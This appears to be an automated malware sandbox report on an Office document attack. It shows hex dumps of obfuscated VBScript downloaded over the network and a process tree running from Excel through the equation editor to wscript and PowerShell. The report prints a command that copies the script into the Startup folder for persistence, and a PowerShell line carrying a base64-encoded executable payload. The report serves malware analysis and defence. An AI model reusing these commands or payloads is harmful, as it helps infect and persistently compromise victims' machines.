                  2023-06-21 04:25:41 UTC128INData Raw: 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 26 00 20 00 22 00 78 00 78 00 56 00 6b 00 46 00 66 00 6b 00 34 00 5a 00 76 00 2f 00 2f 00 2f 00 33 00 4a 00 79 00 44 00 53 00 78 00 78 00 56 00 6b 00 46 00 66 00 67 00 44 00 53 00 78 00 78 00 56 00 6b 00 46 00 66 00 77 00 47 00 79 00 68 00 4b 00 41 00 41 00 22 00 20 00 0d 00 0a 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 3d 00 20 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55
                  Data Ascii: pBqDGLwBUKKWIypIcpPPDPXuI & "xxVkFfk4Zv///3JyDSxxVkFfgDSxxVkFfwGyhKAA" LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI = LYcxPuUPKPcxU
                  2023-06-21 04:25:41 UTC144INData Raw: 41 00 72 00 43 00 69 00 22 00 20 00 0d 00 0a 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 3d 00 20 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 26 00 20 00 22 00 73 00 43 00 41 00 67 00 6f 00 47 00 4b 00 69 00 49 00 44 00 2f 00 68 00 55 00 46 00 41 00 41 00 41 00 62 00 4b 00 68 00 34 00 43 00 4b 00 44 00 53 00 78 00 78 00 56 00 6b 00 46 00 66 00 4d 00 41 00 41 00 41
                  Data Ascii: ArCi" LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI = LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI & "sCAgoGKiID/hUFAAAbKh4CKDSxxVkFfMAAA
                  2023-06-21 04:25:41 UTC160INData Raw: 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 26 00 20 00 22 00 78 00 78 00 56 00 6b 00 46 00 66 00 41 00 41 00 44 00 6c 00 41 00 44 00 53 00 78 00 78 00 56 00 6b 00 46 00 66 00 4d 00 41 00 4f 00 41 00 41 00 44 00 41 00 51 00 41 00 41 00 72 00 77 00 41 00 41 00 41 00 4f 00 55 00 41 00 45 00 77 00 41 00 22 00 20 00 0d 00 0a 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 3d 00 20 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70
                  Data Ascii: BqDGLwBUKKWIypIcpPPDPXuI & "xxVkFfAADlADSxxVkFfMAOAADAQAArwAAAOUAEwA" LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI = LYcxPuUPKPcxUp
                  2023-06-21 04:25:41 UTC176INData Raw: 41 00 44 00 53 00 22 00 20 00 0d 00 0a 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 3d 00 20 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 26 00 20 00 22 00 78 00 78 00 56 00 6b 00 46 00 66 00 41 00 4b 00 73 00 49 00 41 00 41 00 41 00 44 00 53 00 78 00 78 00 56 00 6b 00 46 00 66 00 41 00 4e 00 4d 00 41 00 41 00 41 00 41 00 44 00 53 00 78 00 78 00 56 00 6b 00 46 00 66
                  Data Ascii: ADS" LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI = LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI & "xxVkFfAKsIAAADSxxVkFfANMAAAADSxxVkFf
                  2023-06-21 04:25:41 UTC192INData Raw: 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 26 00 20 00 22 00 56 00 6b 00 46 00 66 00 67 00 51 00 46 00 58 00 44 00 4a 00 63 00 44 00 53 00 78 00 78 00 56 00 6b 00 46 00 66 00 67 00 51 00 46 00 67 00 43 00 5a 00 77 00 44 00 53 00 78 00 78 00 56 00 6b 00 46 00 66 00 61 00 51 00 46 00 4e 00 43 00 61 00 22 00 20 00 0d 00 0a 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 3d 00 20 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70
                  Data Ascii: qDGLwBUKKWIypIcpPPDPXuI & "VkFfgQFXDJcDSxxVkFfgQFgCZwDSxxVkFfaQFNCa" LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI = LYcxPuUPKPcxUpp
                  2023-06-21 04:25:41 UTC208INData Raw: 6c 00 77 00 22 00 20 00 0d 00 0a 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 3d 00 20 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 26 00 20 00 22 00 5a 00 55 00 5a 00 79 00 62 00 32 00 31 00 49 00 59 00 57 00 35 00 6b 00 62 00 47 00 55 00 41 00 55 00 48 00 4a 00 76 00 59 00 32 00 56 00 7a 00 63 00 30 00 68 00 68 00 62 00 6d 00 52 00 73 00 5a 00 51 00 44 00 53 00 78
                  Data Ascii: lw" LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI = LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI & "ZUZyb21IYW5kbGUAUHJvY2Vzc0hhbmRsZQDSx
                  2023-06-21 04:25:41 UTC224INData Raw: 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 26 00 20 00 22 00 58 00 44 00 53 00 78 00 78 00 56 00 6b 00 46 00 66 00 30 00 61 00 57 00 39 00 75 00 41 00 45 00 6c 00 75 00 64 00 47 00 56 00 79 00 62 00 67 00 44 00 53 00 78 00 78 00 56 00 6b 00 46 00 66 00 44 00 62 00 33 00 44 00 53 00 78 00 78 00 56 00 22 00 20 00 0d 00 0a 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 3d 00 20 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42
                  Data Ascii: DGLwBUKKWIypIcpPPDPXuI & "XDSxxVkFf0aW9uAEludGVybgDSxxVkFfDb3DSxxV" LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI = LYcxPuUPKPcxUppB
                  2023-06-21 04:25:41 UTC240INData Raw: 59 00 22 00 20 00 0d 00 0a 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 3d 00 20 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 26 00 20 00 22 00 75 00 49 00 63 00 6d 00 68 00 34 00 44 00 53 00 78 00 78 00 56 00 6b 00 46 00 66 00 49 00 57 00 47 00 58 00 6d 00 64 00 59 00 59 00 61 00 61 00 44 00 53 00 78 00 78 00 56 00 6b 00 46 00 66 00 67 00 6e 00 73 00 44 00 53 00 78
                  Data Ascii: Y" LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI = LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI & "uIcmh4DSxxVkFfIWGXmdYYaaDSxxVkFfgnsDSx
                  2023-06-21 04:25:41 UTC256INData Raw: 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 26 00 20 00 22 00 65 00 4f 00 48 00 2b 00 34 00 6e 00 35 00 69 00 38 00 47 00 4e 00 36 00 34 00 2f 00 39 00 6b 00 66 00 32 00 54 00 35 00 70 00 58 00 76 00 41 00 51 00 74 00 31 00 47 00 48 00 63 00 4d 00 65 00 52 00 35 00 37 00 45 00 48 00 30 00 53 00 41 00 22 00 20 00 0d 00 0a 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 3d 00 20 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71
                  Data Ascii: GLwBUKKWIypIcpPPDPXuI & "eOH+4n5i8GN64/9kf2T5pXvAQt1GHcMeR57EH0SA" LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI = LYcxPuUPKPcxUppBq
                  2023-06-21 04:25:41 UTC272INData Raw: 22 00 20 00 0d 00 0a 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 3d 00 20 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 26 00 20 00 22 00 4d 00 53 00 67 00 4f 00 6b 00 59 00 45 00 6f 00 44 00 74 00 48 00 41 00 59 00 67 00 41 00 51 00 67 00 53 00 67 00 4f 00 6b 00 45 00 49 00 41 00 45 00 49 00 47 00 41 00 77 00 67 00 44 00 53 00 78 00 78 00 56 00 6b 00 46 00 66 00 44
                  Data Ascii: " LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI = LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI & "MSgOkYEoDtHAYgAQgSgOkEIAEIGAwgDSxxVkFfD
                  2023-06-21 04:25:41 UTC288INData Raw: 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 26 00 20 00 22 00 41 00 41 00 41 00 41 00 41 00 41 00 41 00 41 00 44 00 4d 00 41 00 6a 00 51 00 41 00 41 00 41 00 44 00 53 00 78 00 78 00 56 00 6b 00 46 00 66 00 57 00 41 00 46 00 4d 00 41 00 58 00 77 00 44 00 53 00 78 00 78 00 56 00 6b 00 46 00 66 00 57 00 22 00 20 00 0d 00 0a 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 3d 00 20 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44
                  Data Ascii: LwBUKKWIypIcpPPDPXuI & "AAAAAAAADMAjQAAADSxxVkFfWAFMAXwDSxxVkFfW" LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI = LYcxPuUPKPcxUppBqD
                  2023-06-21 04:25:41 UTC304INData Raw: 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 47 00 65 00 74 00 52 00 65 00 73 00 6f 00 75 00 72 00 63 00 65 00 28 00 22 00 4c 00 5f 00 6f 00 70 00 74 00 43 00 6c 00 65 00 61 00 72 00 50 00 4b 00 65 00 79 00 46 00 72 00 6f 00 6d 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 55 00 73 00 61 00 67 00 65 00 22 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 4f 00 70 00 74 00 4c 00 69 00 6e 00 65 00 20 00 47 00 65 00 74 00 52 00 65 00 73 00 6f 00 75 00 72 00 63 00 65 00 28 00 22 00 4c 00 5f 00 6f 00 70 00 74 00 49 00 6e 00 73 00 74 00 61 00 6c 00 6c 00 4c 00 69 00 63 00 65 00 6e 00 73 00 65 00 22 00 29 00 2c 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 47 00 65
                  Data Ascii: GetResource("L_optClearPKeyFromRegistryUsage") OptLine GetResource("L_optInstallLicense"), Ge
                  2023-06-21 04:25:41 UTC320INData Raw: 34 00 f0 00 fd ff 5e 00 5d 00 1e 26 23 00 f0 00 28 00 f8 00 3a 00 28 00 28 00 f0 00 34 00 23 00 1d 26 1e 26 28 00 24 00 6e 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 44 00 42 00 77 00 4b 00 47 00 55 00 63 00 57 00 47 00 63 00 76 00 51 00 51 00 53 00 68 00 77 00 4f 00 77 00 61 00 68 00 54 00 74 00 62 00 59 00 69 00 78 00 63 00 47 00 47 00 71 00 63 00 69 00 4b 00 55 00 6d 00 4f 00 64 00 4d 00 20 00 3d 00 20 00 44 00 42 00 77 00 4b 00 47 00 55 00 63 00 57 00 47 00 63 00 76 00 51 00 51 00 53 00 68 00 77 00 4f 00 77 00 61 00 68 00 54 00 74 00 62 00 59 00 69 00 78 00 63 00 47 00 47 00 71 00 63 00 69 00 4b 00 55 00 6d 00 4f 00 64 00 4d 00 20 00 26 00 20 00 22 00 75 00 6c 00 6c 00 2c 00 20 00 5b 00 23 00 4c 00 c0 25 54 00 40 00 2a 00 6c 00 5e 00 6a 00 28
                  Data Ascii: 4^]&#(:((4#&&($n" DBwKGUcWGcvQQShwOwahTtbYixcGGqciKUmOdM = DBwKGUcWGcvQQShwOwahTtbYixcGGqciKUmOdM & "ull, [#L%T@*l^j(
                  2023-06-21 04:25:41 UTC336INData Raw: 55 00 54 00 48 00 32 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 61 00 75 00 74 00 68 00 22 00 0d 00 0a 00 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 63 00 6f 00 6e 00 73 00 74 00 20 00 53 00 48 00 4f 00 52 00 54 00 43 00 55 00 54 00 5f 00 50 00 52 00 4f 00 58 00 59 00 41 00 55 00 54 00 48 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 70 00 61 00 22 00 0d 00 0a 00 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 63 00 6f 00 6e 00 73 00 74 00 20 00 53 00 48 00 4f 00 52 00 54 00 43 00 55 00 54 00 5f 00 50 00 52 00 4f 00 58 00 59 00 41 00 55 00 54 00 48 00 32 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 70 00 72 00 6f 00 78 00 79 00 61 00 75 00 74 00 68 00 22 00 0d 00 0a 00 70 00 72 00 69 00 76
                  Data Ascii: UTH2 = "auth"private const SHORTCUT_PROXYAUTH = "pa"private const SHORTCUT_PROXYAUTH2 = "proxyauth"priv
                  2023-06-21 04:25:41 UTC352INData Raw: 20 00 20 00 20 00 20 00 4c 00 43 00 61 00 73 00 65 00 28 00 66 00 6f 00 72 00 6d 00 61 00 74 00 4f 00 70 00 74 00 69 00 6f 00 6e 00 29 00 20 00 3d 00 20 00 56 00 41 00 4c 00 5f 00 46 00 4f 00 52 00 4d 00 41 00 54 00 5f 00 50 00 52 00 45 00 54 00 54 00 59 00 20 00 4f 00 72 00 20 00 5f 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 4c 00 43 00 61 00 73 00 65 00 28 00 66 00 6f 00 72 00 6d 00 61 00 74 00 4f 00 70 00 74 00 69 00 6f 00 6e 00 29 00 20 00 3d 00 20 00 56 00 41 00 4c 00 5f 00 46 00 4f 00 52 00 4d 00 41 00 54 00 5f 00 54 00 45 00 58 00 54 00 29 00 20 00 54 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 73 00 74 00 64 00 45 00 72 00 72 00 2e 00 57 00 72 00 69 00 74 00 65 00 4c
                  Data Ascii: LCase(formatOption) = VAL_FORMAT_PRETTY Or _ LCase(formatOption) = VAL_FORMAT_TEXT) Then stdErr.WriteL
                  2023-06-21 04:25:41 UTC368INData Raw: 20 00 20 00 20 00 3d 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 4f 00 62 00 6a 00 65 00 63 00 74 00 28 00 22 00 53 00 63 00 72 00 69 00 70 00 74 00 69 00 6e 00 67 00 2e 00 44 00 69 00 63 00 74 00 69 00 6f 00 6e 00 61 00 72 00 79 00 22 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 53 00 65 00 74 00 20 00 6d 00 5f 00 6e 00 61 00 6d 00 65 00 64 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 73 00 20 00 20 00 20 00 3d 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 4f 00 62 00 6a 00 65 00 63 00 74 00 28 00 22 00 53 00 63 00 72 00 69 00 70 00 74 00 69 00 6e 00 67 00 2e 00 44 00 69 00 63 00 74 00 69 00 6f 00 6e 00 61 00 72 00 79 00 22 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 53 00 65 00 74 00 20 00 6d 00 5f
                  Data Ascii: = CreateObject("Scripting.Dictionary") Set m_namedArguments = CreateObject("Scripting.Dictionary") Set m_
                  2023-06-21 04:25:42 UTC384INData Raw: 20 00 20 00 20 00 20 00 45 00 6c 00 73 00 65 00 49 00 66 00 20 00 4d 00 69 00 64 00 28 00 63 00 75 00 72 00 72 00 65 00 6e 00 74 00 50 00 61 00 72 00 61 00 6d 00 65 00 74 00 65 00 72 00 2c 00 4c 00 65 00 6e 00 28 00 63 00 75 00 72 00 72 00 65 00 6e 00 74 00 50 00 61 00 72 00 61 00 6d 00 65 00 74 00 65 00 72 00 29 00 2c 00 31 00 29 00 20 00 3d 00 20 00 22 00 22 00 22 00 22 00 20 00 54 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 45 00 72 00 72 00 6f 00 72 00 48 00 61 00 6e 00 64 00 6c 00 65 00 72 00 20 00 54 00 72 00 75 00 65 00 2c 00 74 00 5a 00 53 00 6a 00 20 00 26 00 20 00 70
                  Data Ascii: ElseIf Mid(currentParameter,Len(currentParameter),1) = """" Then ErrorHandler True,tZSj & p
                  2023-06-21 04:25:42 UTC400INData Raw: 20 00 20 00 20 00 20 00 20 00 20 00 20 00 6d 00 5f 00 6b 00 6e 00 6f 00 77 00 6e 00 50 00 61 00 72 00 61 00 6d 00 65 00 74 00 65 00 72 00 4e 00 61 00 6d 00 65 00 73 00 2e 00 41 00 64 00 64 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 46 00 49 00 4c 00 45 00 2c 00 74 00 72 00 75 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 6d 00 5f 00 6b 00 6e 00 6f 00 77 00 6e 00 50 00 61 00 72 00 61 00 6d 00 65 00 74 00 65 00 72 00 4e 00 61 00 6d 00 65 00 73 00 2e 00 41 00 64 00 64 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 46 00 49 00 4c 00 54 00 45 00 52 00 2c 00 74 00 72 00 75 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 6d 00 5f 00 6b 00 6e 00 6f 00 77 00 6e 00 50 00 61 00 72 00 61 00 6d 00 65 00 74 00 65 00 72 00 4e
                  Data Ascii: m_knownParameterNames.Add NPARA_FILE,true m_knownParameterNames.Add NPARA_FILTER,true m_knownParameterN


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:06:25:19
                  Start date:21/06/2023
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Imagebase:0x13fd50000
                  File size:28253536 bytes
                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:3
                  Start time:06:25:39
                  Start date:21/06/2023
                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Imagebase:0x400000
                  File size:543304 bytes
                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:6
                  Start time:06:25:44
                  Start date:21/06/2023
                  Path:C:\Windows\SysWOW64\wscript.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\jyrthfdwrg.vbs"
                  Imagebase:0xf30000
                  File size:141824 bytes
                  MD5 hash:979D74799EA6C8B8167869A68DF5204A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:7
                  Start time:06:25:45
                  Start date:21/06/2023
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\jyrthfdwrg.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Wk.vbs')
                  Imagebase:0x4a850000
                  File size:302592 bytes
                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:9
                  Start time:06:25:45
                  Start date:21/06/2023
                  Path:C:\Windows\SysWOW64\PING.EXE
                  Wow64 process (32bit):true
                  Commandline:ping 127.0.0.1 -n 10
                  Imagebase:0x370000
                  File size:15360 bytes
                  MD5 hash:6242E3D67787CCBF4E06AD2982853144
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  Target ID:10
                  Start time:06:25:57
                  Start date:21/06/2023
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:powershell -command [System.IO.File]::Copy('C:\Windows\system32\jyrthfdwrg.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Wk.vbs')
                  Imagebase:0x223b0000
                  File size:452608 bytes
                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  Target ID:11
                  Start time:06:25:58
                  Start date:21/06/2023
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAGXtf2QAAAAAAAAAAOAAAiELAVAAAEQAAAAGAAAAAAAAAmMAAAAgAAAAgAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAADAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAALBiAABPAAAAAIAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAAAoYgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAACEMAAAAgAAAARAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAgAAAAAQAAABGAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKAAAAACAAAASgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADkYgAAAAAAAEgAAAACAAUASDEAANguAAADAAAAAAAAACBgAAAIAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABooSQAABioeAigBAAAKKh4CKAQAAAoqABMwCABJAAAAAAAAAHMFAAAKgAEAAAQWKwEWRQMAAAACAAAADwAAABwAAAArJ3MGAAAKgAIAAAQXK+BzBwAACoADAAAEGCvTcwgAAAqABAAABBkrxioufgEAAARvCQAACioufgIAAARvCgAACioufgMAAARvCwAACioufgQAAARvDAAACir2FysBFiwAfgUAAAQUKBsAAAosJHIBAABwGyhKAAAG0AUAAAIoEAAACm8cAAAKcx0AAAqABQAABH4FAAAEKhp+BgAABCoeAoAGAAAEKlZzDQAABigeAAAKdAYAAAKABwAABCoeAigfAAAKKhp+BwAABCoaKA4AAAYqHgIoEwAACioAABswDwDnBgAAAQAAESAADAAAKCAAAAoWKwEWRQwAAAAFAAAAVwEAAGQBAAAzAgAAaQIAAHoCAAClAgAA0wIAAPgCAAAVAwAAaQMAALUDAAA4dQYAAHMhAAAKJSgiAAAKbyMAAAoCKCQAAApyIQAAcBsoSgAABnItAABwGihKAAAGbyU